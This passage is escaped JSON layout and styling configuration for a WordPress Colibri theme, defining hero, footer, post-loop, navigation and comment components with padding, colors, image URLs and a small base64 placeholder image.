:{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\",\"25-h21\"]},{\"id\":55,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\",\"25-h22\"]},{\"id\":56,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\",\"25-h23\"]},{\"id\":57,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"none\",\"color\":\"${theme.colors.0}\",\"overlay\":{\"shape\":{\"value\":\"many-rounded-squares-blue\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"light\":0,\"color\":{\"value\":\"${theme.colors.5}\",\"opacity\":\"0.7\",\"opacity_\":0},\"enabled\":false,\"type\":\"color\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"rgba(183,33,255, 0)\"},{\"position\":\"100\",\"color\":\"rgba(33,212,253, 0)\"}]}},\"image\":[{\"source\":{\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]},\"type\":\"gradient\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp\"},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/youtu.be\\/BEsPBL5z22E\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":10},\"bottom\":{\"unit\":\"px\",\"value\":\"50\"}},\"separatorBottom\":{\"type\":\"mountains\",\"color\":\"${theme.colors.4}\",\"height\":{\"value\":\"70\",\"unit\":\"px\"},\"enabled\":true,\"negative\":false},\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":147},\"type\":\"fit-to-content\"},\"separatorTop\":{\"enabled\":false,\"height\":{\"unit\":\"px\",\"value\":110},\"color\":\"white\",\"type\":\"techno\",\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textWithMediaOnRight\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"nodeId\":\"10-h29\",\"nodes\":[\"10-h25\",\"25-h24\"],\"v\":\"1.1\"},{\"id\":58,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"10-h37\",\"nodes\":[\"10-h26\",\"25-h25\"],\"v\":\"1.1\"},{\"id\":59,\"type\":\"hop-column\",\"nodeId\":\"10-h38\",\"nodes\":[\"10-h27\",\"25-h26\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}},{\"id\":60,\"type\":\"hop-page-title\",\"nodeId\":\"10-h39\",\"nodes\":[\"10-h28\",\"25-h27\"],\"v\":\"1.1\"},{\"id\":61,\"type\":\"hop-footer\",\"props\":{\"useFooterParallax\":true},\"v\":\"1.1\",\"nodes\":[\"13-f1\",\"28-f1\"]},{\"id\":62,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"30\"},\"bottom\":{\"path\":\"value\",\"value\":\"30\"}}},\"v\":\"1.1\",\"nodes\":[\"13-f2\",\"28-f2\"]},{\"id\":63,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":1,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"13-f3\",\"28-f3\"]},{\"id\":64,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":1,\"verticalInnerGap\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"13-f4\",\"28-f4\"]},{\"id\":65,\"type\":\"hop-copyright\",\"nodeId\":\"13-f6\",\"v\":\"1.1\",\"nodes\":[\"13-f5\",\"28-f5\"]},{\"id\":66,\"type\":\"hop-main\",\"nodeId\":\"71-m1\",\"v\":\"1.1\",\"nodes\":[\"432-m1\",\"31-m1\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"40\",\"y\":\"10\",\"spread\":\"0\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":67,\"type\":\"hop-section\",\"nodeId\":\"16-m29\",\"nodes\":[\"432-m2\",\"31-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"props\":{\"width\":\"boxed\"}},{\"id\":68,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m25\",\"31-m25\"],\"v\":\"1.1\"},{\"id\":69,\"type\":\"hop-column\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m26\",\"31-m26\"],\"v\":\"1.1\"},{\"id\":70,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m35\",\"nodes\":[\"432-m27\",\"31-m27\"],\"v\":\"1.1\"},{\"id\":71,\"type\":\"hop-text\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m28\",\"31-m28\"],\"v\":\"1.1\"},{\"id\":72,\"type\":\"hop-post-loop\",\"nodeId\":\"23-m35\",\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"432-m3\",\"31-m3\"]},{\"id\":73,\"type\":\"hop-loop-item\",\"nodeId\":\"23-m36\",\"v\":\"1.1\",\"nodes\":[\"432-m4\",\"31-m4\"],\"style\":{\"background\":{\"color\":\"\"},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":74,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"23-m37\",\"style\":{\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"432-m5\",\"31-m5\"]},{\"id\":75,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"itemsPerRow\":1,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m6\",\"31-m6\"]},{\"id\":76,\"type\":\"hop-column\",\"nodeId\":\"1723-m27\",\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"v\":\"1.1\",\"nodes\":[\"432-m7\",\"31-m7\"],\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},{\"id\":77,\"type\":\"hop-post-meta\",\"nodeId\":\"26-m15\",\"v\":\"1.1\",\"nodes\":[\"432-m8\",\"31-m8\"],\"style\":{\"descendants\":{\"metaDataLinks\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"decoration\":\"none\",\"color\":\"${theme.colors.5|variant1}\",\"weight\":\"400\",\"family\":\"Open Sans\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}},\"icons\":{\"height\":{\"value\":\"18\"},\"width\":{\"value\":\"18\"},\"display\":\"none\",\"margin\":{\"right\":{\"value\":\"5\"}}},\"metaDataSuffix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5|variant1}\"}}}},\"metaDataPrefix\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"color\":\"${theme.colors.5|variant2}\"}}}}},{\"id\":78,\"type\":\"hop-post-content\",\"nodeId\":\"23-m40\",\"v\":\"1.1\",\"nodes\":[\"432-m9\",\"31-m9\"],\"style\":{\"descendants\":{\"content\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"holders\":{\"p\":{\"color\":\"${theme.colors.5|variant2}\"}}}}}}},{\"id\":79,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-categories-container\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m10\",\"31-m10\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":80,\"type\":\"hop-column\",\"nodeId\":\"16-m38\",\"nodes\":[\"432-m11\",\"31-m11\"],\"v\":\"1.1\",\"props\":{\"verticalAlign\":\"center\"}},{\"id\":81,\"type\":\"hop-text\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m12\",\"31-m12\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}},{\"id\":82,\"type\":\"hop-column\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m13\",\"31-m13\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\"},\"props\":{\"verticalAlign\":\"center\"}},{\"id\":83,\"type\":\"hop-post-categories\",\"nodeId\":\"16-m37\",\"nodes\":[\"432-m14\",\"31-m14\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"categoriesLinks\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}},\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}}}}}},{\"id\":84,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"equalHeight\":false}},\"type\":\"hop-post-tags-container\",\"nodeId\":\"16-m30\",\"nodes\":[\"432-m15\",\"31-m15\"],\"v\":\"1.1\"},{\"id\":85,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m16\",\"31-m16\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0},\"verticalAlign\":\"center\"}},{\"id\":86,\"type\":\"hop-text\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m17\",\"31-m17\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"400\",\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"},\"color\":\"${theme.colors.5|variant2}\"}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"type\":\"normal\"}},{\"id\":87,\"type\":\"hop-column\",\"nodeId\":\"16-m32\",\"nodes\":[\"432-m18\",\"31-m18\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"vSpace\":{\"value\":23}},\"verticalAlign\":\"center\"}},{\"id\":88,\"type\":\"hop-post-tags\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m19\",\"31-m19\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"tagsLinks\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.5}\"}}},\"typography\":{\"color\":\"${theme.colors.4|variant2}\",\"decoration\":\"none\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"lineHeight\":{\"unit\":\"\",\"value\":\"1.6\"}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"5\",\"unit\":\"px\"}}},\"tagsPrefix\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}},\"typography\":{\"color\":\"${theme.colors.5|variant1}\",\"size\":{\"unit\":\"px\",\"value\":\"14\"}}}}}},{\"id\":89,\"props\":{\"layout\":{\"equalWidth\":false,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}},\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-post-nav-container\",\"nodeId\":\"16-m39\",\"nodes\":[\"432-m20\",\"31-m20\"],\"v\":\"1.1\",\"style\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"30\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"30\",\"unit\":\"px\"}},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"0\",\"unit\":\"px\"},\"color\":\"rgb(238, 238, 238)\"}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}}},{\"id\":90,\"type\":\"hop-column\",\"nodeId\":\"16-m40\",\"nodes\":[\"432-m21\",\"31-m21\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"left\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":91,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m48\",\"v\":\"1.1\",\"nodes\":[\"432-m22\",\"31-m22\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}},\"style\":\"none\",\"color\":\"black\"},\"left\":{\"style\":\"none\",\"color\":\"black\"},\"right\":{\"style\":\"none\",\"color\":\"black\"}},\"background\":{\"color\":\"\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}},\"navigationTitle\":{\"maxWidth\":{\"value\":\"40\",\"unit\":\"ch\"}}}}},{\"id\":92,\"type\":\"hop-column\",\"nodeId\":\"16-m41\",\"nodes\":[\"432-m23\",\"31-m23\"],\"v\":\"1.1\",\"style\":{\"textAlign\":\"right\",\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":2}}},{\"id\":93,\"type\":\"hop-post-nav-button\",\"nodeId\":\"23-m49\",\"v\":\"1.1\",\"nodes\":[\"432-m24\",\"31-m24\"],\"style\":{\"descendants\":{\"navigationButton\":{\"typography\":{\"color\":\"${theme.colors.5|variant3}\",\"decoration\":\"none\"},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}}}}}},{\"id\":94,\"type\":\"hop-section\",\"nodeId\":\"16-m55\",\"nodes\":[\"432-m29\",\"31-m29\"],\"style\":{\"padding\":{\"top\":{\"value\":0},\"bottom\":{\"value\":0}}},\"v\":\"1.1\"},{\"id\":95,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m59\",\"nodes\":[\"432-m34\",\"31-m34\"],\"v\":\"1.1\"},{\"id\":96,\"type\":\"hop-column\",\"nodeId\":\"16-m60\",\"nodes\":[\"432-m35\",\"31-m35\"],\"v\":\"1.1\"},{\"id\":97,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m61\",\"nodes\":[\"432-m36\",\"31-m36\"],\"v\":\"1.1\"},{\"id\":98,\"type\":\"hop-text\",\"nodeId\":\"16-m62\",\"nodes\":[\"432-m37\",\"31-m37\"],\"v\":\"1.1\"},{\"id\":99,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"horizontalGap\":0,\"verticalGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"16-m56\",\"nodes\":[\"432-m30\",\"31-m30\"],\"v\":\"1.1\"},{\"id\":100,\"type\":\"hop-column\",\"nodeId\":\"16-m57\",\"nodes\":[\"432-m31\",\"31-m31\"],\"v\":\"1.1\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"0\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"}},\"textAlign\":\"left\",\"media\":{\"tablet\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}}},{\"id\":101,\"type\":\"hop-post-comments\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m32\",\"31-m32\"],\"style\":{\"descendants\":{\"commentsTitle\":{\"typography\":{\"decoration\":\"none\",\"color\":\"${theme.colors.5}\",\"weight\":\"600\",\"family\":\"Open 